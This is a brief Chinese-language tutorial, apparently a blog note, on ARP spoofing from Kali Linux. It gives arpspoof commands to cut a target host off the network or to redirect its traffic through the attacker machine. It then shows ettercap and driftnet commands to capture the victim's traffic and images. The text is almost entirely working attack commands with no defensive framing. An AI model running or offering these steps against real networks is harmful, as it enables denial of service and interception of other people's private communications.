kali Linux ARP 欺骗

apr 分为断网跟转发功能

在 /proc/sys/net/ipv4/ip_forward 文件中

如果设置为 0 代表断网（默认设置），如果是 1 代表转发

 

1、断网

设置 /proc/sys/net/ipv4/ip_forward 值为 0

arpspoof -i eth0 -t 192.168.20.10 192.168.20.1

-i interface 指定eth0 网卡，-t target 目标（192.168.20.10）  192.168.20.1（网关）

2、流量转发

设置 /proc/sys/net/ipv4/ip_forward 值为 1

arpspoof -i eth0 -t 192.168.20.6 192.168.20.99

 

192.168.20.6 为目标主机，192.168.20.99 为 kali 攻击机

2.1、然后用 ettercap 捕获流量情况

ettercap -Tq -i eth0    # T 代表 text 文本显示  q 代表安静

2.2、你还可以使用 driftnet 捕获图片

driftnet -i  eth0